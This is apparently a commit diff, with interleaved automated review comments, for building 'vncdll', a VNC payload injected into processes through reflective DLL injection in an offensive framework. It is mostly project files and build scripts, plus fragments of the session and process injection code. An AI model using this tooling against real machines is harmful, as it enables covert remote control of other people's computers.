} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,6 +0,0 @@
#ifdef _X64_
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
#endif


@ -1,437 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="loader"
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
RootNamespace="loader"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X86_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X64_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.x64.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.x64.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\context.c"
>
</File>
<File
RelativePath=".\loader.c"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.c"
>
</File>
<File
RelativePath=".\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.c"
>
</File>
<File
RelativePath=".\ps.c"
>
</File>
<File
RelativePath=".\session.c"
>
</File>
</Filter>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\context.h"
>
</File>
<File
RelativePath=".\loader.h"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.h"
>
</File>
<File
RelativePath=".\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\ReflectiveLoader.h"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.h"
>
</File>
<File
RelativePath=".\ps.h"
>
</File>
<File
RelativePath=".\session.h"
>
</File>
</Filter>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
<File
RelativePath=".\loader.rc"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

32
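--- a/external/source/vncdll/make.bat
+++ b/external/source/vncdll/make.bat
@@ -0,0 +1,32 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X64" GOTO BUILD_X64
+ECHO "Building VNCDLL x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+:BUILD_X86
+ECHO "Building VNCDLL x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+:BUILD_X64
+ECHO "Building VNCDLL x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+:RUN
+PUSHD workspace
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+GOTO :END
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+:END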
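Review bot: The platform selection on the third and fourth lines is case-sensitive, so `make.bat x64` (lowercase, as the script's own ECHO text spells it) never reaches BUILD_X64 and silently falls through to the all-platforms build, while `make.bat x86` only matches in lowercase. Batch IF string comparison ignores case only with the /I switch; the two lines should read `IF /I "%1"=="x86" GOTO BUILD_X86` and `IF /I "%1"=="x64" GOTO BUILD_X64`. The script also does `PUSHD workspace` before invoking `make.msbuild`, yet this commit adds make.msbuild as a sibling of make.bat under external/source/vncdll/, so the build step presumably fails to find the project unless a copy also lives in workspace/ — worth confirming the intended location. An unrecognized argument currently triggers the full build rather than a usage message, which may not be what the caller expects.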

19
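--- a/external/source/vncdll/make.msbuild
+++ b/external/source/vncdll/make.msbuild
@@ -0,0 +1,19 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<PropertyGroup>
+<SolutionPath>.\vncdll.sln</SolutionPath>
+</PropertyGroup>
+<Target Name="all" DependsOnTargets="x86;x64" />
+<Target Name="x86">
+<Message Text="Building VNCDLL x86 Release version" />
+<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+</Target>
+<Target Name="x64">
+<Message Text="Building VNCDLL x64 Release version" />
+<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+</Target>
+</Project>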

Binary file not shown.

Binary file not shown.


@ -1,11 +1,10 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
ProjectSection(ProjectDependencies) = postProject
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
EndProjectSection
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE


@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{
do
{
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
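Review bot: The replacement `_snprintf_s` call passes `MAX_PATH - 1` as the count, which is the hand-spelled way of asking for truncation; `_snprintf_s( cNamedPipe, MAX_PATH, _TRUNCATE, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );` states that intent directly and cannot drift out of step with the buffer size if MAX_PATH is ever replaced by a local constant. The `dprintf` on the following line still reports the function as `loader_message_thread` while the hunk header shows it is `context_message_thread`; that line is untouched by this commit, but since the adjacent line is being rewritten it is a cheap correction to the log output. context_message_thread starts and ends outside the hunk.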


@ -1,7 +1,7 @@
#include "loader.h"
#include "ps.h"
#include "inject.h"
#include "LoadLibraryR.h"
#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch
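Review bot: The include now hard-codes the path `../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h` into the source, while vncdll.vcxproj in the same commit already routes the sibling `common` directory through `AdditionalIncludeDirectories`. Adding `..\..\ReflectiveDLLInjection\inject\src` to that property and keeping `#include "LoadLibraryR.h"` keeps knowledge of the tree layout in one place (the project file) and leaves the source untouched if the external tree moves; the same applies to the ReflectiveLoader.c include added in loader.c. The rest of the file is outside the hunk.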


@ -5,11 +5,12 @@
#include "ps.h"
#include "session.h"
#include "inject.h"
#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/*
* The HINSTANCE of this injected dll.
*/
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess;
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 );
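Review bot: The new `#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"` pulls a whole translation unit into loader.c, and nothing in this hunk or in the vncdll.vcxproj PreprocessorDefinitions sets `REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` or `REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN`, both of which the deleted local ReflectiveLoader.c defined itself ahead of the loader body. If the shared copy does not define them, ReflectiveLoader is built with the stub signature and the shared file's own DllMain ends up in this unit; confirm against the shared header, and if they are required add the two `#define`s immediately before the include together with a comment explaining why the .c file is included rather than compiled as its own unit. In the second hunk, the `0` flag in `"/v /c:0x%08p"` has no defined meaning for `%p` in standard C (MSVC already prints the pointer zero-padded to its full width), so `"/v /c:0x%p"` expresses the same thing portably; note the value is 16 hex digits on x64, which whatever parses this command line must accept, and that parser is not in this commit. Both enclosing functions start outside the hunks.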

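--- /dev/null
+++ b/external/source/vncdll/vncdll/loader.rc
@@ -0,0 +1,18 @@
+#ifdef _X64_
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
+#endif
+#else
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
+#endif
+#endif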
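Review bot: `IDR_VNC_DLL` is used as the resource name without any `#include` of a header that defines it, so the resource compiler should treat it as a string-named resource rather than an integer id. That only works if the loader looks the resource up by that name; the lookup code is not in this commit, so confirm which form it uses and, if it is an integer id, include the defining header at the top of this file so both sides agree. A header comment would also help a reader who does not know the custom `IMG` type, e.g. `// Embedded winvnc DLL (custom resource type IMG, named IDR_VNC_DLL); the paths follow the winvnc project's OutDir layout and _X64_ is set by the vcxproj ResourceCompile definitions`.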


@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{
if( !pProcessIdToSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
}
@ -53,7 +53,7 @@ DWORD session_activeid()
{
if( !pWTSGetActiveConsoleSessionId )
{
hKernel = LoadLibrary( "kernel32.dll" );
hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
}
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken );
}
hKernel = LoadLibrary( "kernel32" );
hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;
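Review bot: `LoadLibraryA( "kernel32.dll" )` is used only to obtain a handle for `GetProcAddress`, but each call increments kernel32's load count and nothing in these hunks releases it; since kernel32 is always mapped in a Win32 process, `GetModuleHandleA( "kernel32.dll" )` returns the handle without taking a reference. The same pattern appears in all three hunks (session_id, session_activeid and session_inject), so it is worth changing together. The third hunk also passes `"kernel32"` without the extension, unlike the other two; harmless, but making the three spellings identical avoids a needless difference. All three enclosing functions start outside their hunks.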

245
external/source/vncdll/vncdll/vncdll.vcxproj vendored Executable file

@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
<RootNamespace>vncdll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
